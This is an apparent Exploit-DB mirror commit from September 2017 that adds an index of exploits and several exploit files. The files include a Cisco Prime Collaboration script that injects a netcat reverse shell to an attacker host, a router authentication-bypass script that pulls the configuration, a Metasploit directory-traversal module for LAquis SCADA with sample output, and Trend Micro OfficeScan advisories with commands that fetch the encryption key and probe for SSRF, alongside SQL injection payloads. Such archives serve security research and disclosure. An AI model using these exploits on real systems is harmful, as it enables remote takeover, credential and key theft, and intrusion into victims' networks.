bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-09-29

Browse source 
14 new exploits

DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)
Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass
DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow

LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)
Oracle WebLogic Server 10.3.6.0 - Java Deserialization
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection
Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure
Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption
Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure
Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery
Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection
Roteador Wireless Intelbras WRN150 - Autentication Bypass
Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-09-29 05:01:35 +00:00
parent ec599357c0
commit a92226f6ac
16 changed files with 1236 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
files.csv
View file

@ -5688,6 +5688,7 @@ id,file,description,date,author,platform,type,port
42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0
42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0
42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9259,6 +9260,8 @@ id,file,description,date,author,platform,type,port
42718,platforms/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",windows,local,0
42735,platforms/windows/local/42735.c,"Netdecision 5.8.2 - Privilege Escalation",2017-09-16,"Peter Baris",windows,local,0
42777,platforms/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,windows,local,0
42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15732,6 +15735,7 @@ id,file,description,date,author,platform,type,port
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
42885,platforms/multiple/remote/42885.rb,"LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)",2017-09-27,"James Fitts",multiple,remote,0
42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
42756,platforms/java/remote/42756.py,"HPE < 7.2 - Java Deserialization",2017-09-19,"Raphael Kuhn",java,remote,0
42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
@ -15861,6 +15865,8 @@ id,file,description,date,author,platform,type,port
42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0
42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38359,6 +38365,7 @@ id,file,description,date,author,platform,type,port
42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0
42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
42543,platforms/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,java,webapps,0
@ -38586,3 +38593,10 @@ id,file,description,date,author,platform,type,port
42802,platforms/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
42884,platforms/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,multiple,webapps,0
42805,platforms/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
42889,platforms/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,php,webapps,0
42892,platforms/windows/webapps/42892.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption",2017-09-28,hyp3rlinx,windows,webapps,0
42893,platforms/php/webapps/42893.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure",2017-09-28,hyp3rlinx,php,webapps,0
42894,platforms/php/webapps/42894.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery",2017-09-28,hyp3rlinx,php,webapps,0
42895,platforms/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,php,webapps,0
42916,platforms/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps,0
42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0

Can't render this file because it is too large.

28
platforms/hardware/remote/42888.sh Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Cisco Prime Collaboration Provisioning < 12.1 - ScriptMgr Servlet Authentication Bypass Remote Code Execution
# Date: 09/27/2017
# Exploit Author: Adam Brown
# Vendor Homepage: https://cisco.com
# Software Link: https://software.cisco.com/download/release.html?mdfid=286308336&softwareid=286289070&release=11.6&flowid=81443
# Version: < 12.1
# Tested on: Debian 8
# CVE : 2017-6622
# Reference: https://www.tenable.com/plugins/index.php?view=single&id=101531
# Mitigation - Upgrade your Cisco Prime Collaboration Provisioning server to 12.1 or later.
# Description - This vulnerability allows an unauthenticated attacker to execute arbitrary Java code on a system running Cisco Prime Collaboration Provisioning server < 12.1 via a scripttext parameter in the ScriptMgr page.
# Usage: ./prime-shell.sh <TARGET-IP> <ATTACKER-IP> <ATTACKER-PORT>
function encode() {
echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"'
}
TARGET=$1
ATTACKER=$2
PORT=$3
BASH=$(encode "/bin/bash")
COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f")
SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});"
curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT"

31
platforms/hardware/webapps/42916.py Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN
150
# Date: 28/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150 Mbps - WRN 150
# Tested on: kali linux, windows 7, 8.1, 10
For more info:
http://whiteboyz.xyz/authentication-bypass-intelbras-wrn-150.html
URL VULN: http://10.0.0.1/
Download backup file:
Payload: curl --cookie "Cookie=admin:language=pt"
http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg
PoC:
#pip install requests
from requests import get
url = "http://10.0.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg"
#url do backup
header = {'Cookie': 'admin:language=pt'}
#setando o cookie no header
r = get(url, headers=header).text
print(r)

97
platforms/java/remote/42806.py Executable file
View file

File diff suppressed because one or more lines are too long

7
platforms/linux/remote/41910.sh
View file

@ -8,9 +8,9 @@ int='\033[94m
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)
SquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)
SquirrelMail_RCE_exploit.sh (ver. 1.0)
SquirrelMail_RCE_exploit.sh (ver. 1.1)
Discovered and coded by
@ -190,4 +190,5 @@ fi
# Done
echo -e "\n[*] All done. Exiting"
echo -e "\n[*] All done. Exiting"

185
platforms/multiple/remote/42885.rb Executable file
View file

@ -0,0 +1,185 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'LAquis SCADA Web Server Directory Traversal Information Disclosure',
'Description' => %q{
This module exploits a directory traversal vulnerability found in the LAquis SCADA
application. The vulnerability is triggered when sending a series of dot dot slashes
(../) to the vulnerable NOME parameter found on the listagem.laquis file.
This module was tested against v4.1.0.2385
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-6020' ],
[ 'ZDI', '17-286' ],
[ 'BID', '97055' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-082-01' ]
],
'DisclosureDate' => 'Mar 29 2017'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(1234)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
res = send_request_raw({
'method' => 'GET',
'uri' => '/'
})
# make sure the webserver is actually listening
if res.code == 200
blob = res.body.to_s.scan(/(?<=href=)[A-Za-z0-9.?=&+]+/)
for url in blob
if url =~ /listagem/
listagem = url
end
end
# make sure the vulnerable page is there
# not all of the examples include the
# vulnerable page, so we test to ensure
# that it is there prior to executing our code
# there is a potential that real world may not
# include the vulnerable page in some cases
# as well
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{listagem}",
})
# trigger
if res.code == 200 and res.body.to_s =~ /<title>Listagem<\/title><\/head>/
loot = []
file_path = "#{datastore['FILE']}"
file_path = file_path.gsub(/\//, "\\")
cleanup = "#{listagem}"
cleanup = cleanup.gsub(/DATA=/, "DATA=#{Rex::Text.rand_text_alphanumeric(15)}")
cleanup = cleanup.gsub(/botao=Enviar\+consulta/, "botao=Submit\+Query")
vulnerability = listagem.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{levels}#{file_path}")
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{vulnerability}"
})
if res and res.code == 200
blob = res.body.to_s
blob.each_line do |line|
loot << line.match(/.*&nbsp;<\/font><\/td>.*$/)
end
loot = loot.join.gsub(/&nbsp;<\/font><\/td>/, "\r\n")
if not loot or loot.empty?
print_status("File from \'#{rhost}:#{rport}\' is empty...")
return
end
file = ::File.basename(datastore['FILE'])
path = store_loot('laquis.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
print_status("Stored \'#{datastore['FILE']}\' to \'#{path}\'")
# cleaning up afterwards because the response
# data from before is written and becomes
# persistent
referer = cleanup.gsub(/DATA=[A-Za-z0-9]+/, "DATA=")
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{listagem}"
})
if res.code == 200
nome = res.body.to_s.match(/(?<=<input type=hidden name=NOME value=")[A-Za-z0-9.]+/)
cleanup = cleanup.gsub(/(?<=NOME=)[A-Za-z0-9.]+/, "#{nome}")
res = send_request_raw({
'method' => 'GET',
'uri' => "/#{cleanup}",
'headers' => {
'Referer' => "http://#{rhost}:#{rport}/#{referer}",
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Connection' => 'close',
'Upgrade-Insecure-Requests' => '1',
'Cache-Control' => 'max-age=0'
}
})
end
return
end
else
print_error("Vulnerable page does not exist...")
end
else
print_error("The server does not appear to be listening...")
end
end
end
__END__
msf auxiliary(laquis_directory_traversal) > show options
Module options (auxiliary/server/laquis_directory_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
DEPTH 10 no Levels to reach base directory
FILE Windows/System32/drivers/etc/hosts no This is the file to download
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.1.2 yes The target address
RPORT 1234 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
msf auxiliary(laquis_directory_traversal) > rexploit
[*] Reloading module...
[*] Stored 'Windows/System32/drivers/etc/hosts' to '/home/james/.msf4/loot/20170927110756_default_192.168.1.2_laquis.file_227964.bin'
[*] Auxiliary module execution completed
james@bloop:~/.msf4/loot$ cat 20170927110456_default_192.168.1.2_laquis.file_677204.bin
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
#
#

46
platforms/php/webapps/42380.txt Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager <= v3.4 - Stored XSS / SQLi
# Date: 2017-07-25
# Exploit Author: 8bitsec
# Vendor Homepage: http://adspro.scripteo.info/
# Software Link: https://codecanyon.net/item/ads-pro-plugin-multipurpose-wordpress-advertising-manager/10275010
# Version: 3.4
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-07-25
Product & Service Introduction:
===============================
Ads Pro is a Premium WordPress Ad Plugin that helps you manage, sell and display your advertising space, in a way that no other plugin can.
Technical Details & Description:
================================
Multiple Stored XSS vulnerabilities found.
Blind SQL Injection on bsa_pro_id parameter.
Proof of Concept (PoC):
=======================
Stored XSS:
On the Front End Order Form the Ad Title and Ad Description parameters are vulnerable. The payload will execute when the ad is displayed.
Blind SQL Injection:
Parameter: bsa_pro_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND 1707=1707
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: bsa_pro_stats=1&bsa_pro_email=some@email.com&bsa_pro_id=xx AND SLEEP(5)
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]

113
platforms/php/webapps/42889.txt Executable file
View file

@ -0,0 +1,113 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
========
OfficeScan
v11.0 and XG (12.0)*
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
Vulnerability Type:
===================
Unauthorized Encryption Key Disclosure
CVE Reference:
==============
CVE-2017-14083
Security Issue:
================
Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG application which usually runs on port 4343 can download
the OfficeScan XG encryption "crypt.key" file. This crypt.key is used for the OfficeScan XG encryption process.
References:
===========
https://success.trendmicro.com/solution/1118372
e.g.
In "config.php"
/* *********************************************************
* Encryption module configurations
*/
$wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key"; <============= HERE
$wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ...
/* *********************************************************
* Framework configurations
*/
Exploit/POC:
=============
[root@localhost /]# wget --no-check-certificate https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
--14:59:52-- https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
Connecting to VICTIM-IP:4343... connected.
WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP':
Self-signed certificate encountered.
HTTP request sent, awaiting response... 200 OK
Length: 32 [application/octet-stream]
Saving to: `crypt.key'
100%[==================================================================================================>] 32 --.-K/s in 0s
14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32]
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=================================
Vendor Notification: May 31, 2017
Vendor: "hotfix in progress". June 23, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

162
platforms/php/webapps/42893.txt Executable file
View file

@ -0,0 +1,162 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
===========
OfficeScan
v11.0 and XG (12.0)*
Vulnerability Type:
===================
Unauthorized NT Domain Disclosure
Unauthorized PHP Information Disclosure
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
CVE Reference:
==============
CVE-2017-14085
Security Issue(s):
================
( NT Domain Disclosure )
Remote unauthenticated attackers who reach the TrendMicro OfficeScan XG application can query the networks NT domains.
NT enumeration is leaked by the web interface when it should not do so. Usually, you use NET commands so while this NT enumeration
is not high in severity, it should not return this information and especially to unauthorized users as it can aid in launching
further attacks.
( PHP Information Disclosure )
Remote unauthenticated attackers that can connect to TrendMicro OfficeScan XG application can query the PHP version and modules.
In 'analyzeWF.php" we see get_loaded_extensions() and phpversion() calls, but session or authentication check is made.
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion());
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions()));
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);
etc...
References:
===========
https://success.trendmicro.com/solution/1118372
Exploit/POC (NT Domain Disclosure):
=====================================
[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
* About to connect() to VICTIM-IP port 4343
* Trying VICTIM-IP... connected
< HTTP/1.1 200 OK
< Pragma: no-cache
< Content-Type: text/plain;charset=utf-8
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Thu, 01 Jun 2017 15:27:27 GMT
< Connection: close
< Content-Length: 510
{
"ERROR" : {
"ERROR_CODE" : 0
},
"RESPONSE" : {
"NODES" : [
{
"NAME" : "Avaya"
},
{
"NAME" : "Km-netprinters"
},
{
"NAME" : "Mshome"
},
{
"NAME" : "Printserver"
},
{
"NAME" : "MyDomain"
},
{
"NAME" : "Workgroup"
},
{
"NAME" : "Xpemb"
}
]
}
}
Exploit / POC (PHP Information Disclosure):
============================================
c:\> curl -k https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php
HTTP/1.1 200 OK
[INI_UPDATE_SECTION]
>>>> Start Anaylze WGF : 2017-06-02 15:58:26
[INFO] Current PHP version: 7.0.6
[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, soap, com_dotnet
[INFO] WGF version : 3.8
[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
[INFO] WGF is /path/to/widgets_new exists : true
[ERROR] C:\Windows\TEMP check read/write permissions : failed
To solved this problem please reference document here.
etc...
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=====================
Vendor Notification: June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

89
platforms/php/webapps/42894.txt Executable file
View file

@ -0,0 +1,89 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
===========
OfficeScan
v11.0 and XG (12.0)*
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
Vulnerability Type:
===================
Unautherized Server Side Request Forgery
CVE Reference:
==============
N/A
Security Issue:
================
Unauthorized LAN attackers that can reach the OfficeScan XG application can make arbitrary HTTP requests to external and internal servers.
Abusing a Server Side Request Forgery flaw in the "help_Proxy.php" functionality.
Exploit/POC:
=============
https://VICTIM-IP:4343/officescan/console/html/Widget/help_proxy.php?url=http://<REQUESTED-IP>:8080
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
<REQUESTED-IP> - - [31/May/2017 12:21:41] "GET / HTTP/1.1" 200 -
help_proxy.php HTTP response:
{"request_url":"http:\/\/<REQUESTED-IP>:8080","http_code":200,"flag":1}
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: May 31, 2017
Vendor reply: "We confirmed that this is a valid vulnerability. We are now working on a hotfix to remediate the issue." : June 30, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

82
platforms/php/webapps/42895.txt Executable file
View file

@ -0,0 +1,82 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.trendmicro.com
Product:
========
OfficeScan
v11.0 and XG (12.0)*
OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent.
Vulnerability Type:
===================
Host Header Injection
CVE Reference:
==============
CVE-2017-14087
Security Issue:
================
Host header injection issue as "db_controller.php" relies on $_SERVER['HTTP_HOST'] which can be spoofed by client, instead of $_SERVER['SERVER_NAME'].
In environments where caching is in place by making HTTP GET request with a poisoned HOST header webpages can potentially render arbitrary
links that point to a malicious website.
Exploit/POC:
=============
c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP"
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
==================================
Vendor Notification: June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

37
platforms/php/webapps/42919.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
# Date: 2017-09-27
# Exploit Author: 8bitsec
# Vendor Homepage: https://www.codester.com/
# Software Link: https://www.codester.com/items/4616/easy-blog-php-script
# Version: 1.3a
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-27
Product & Service Introduction:
===============================
A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
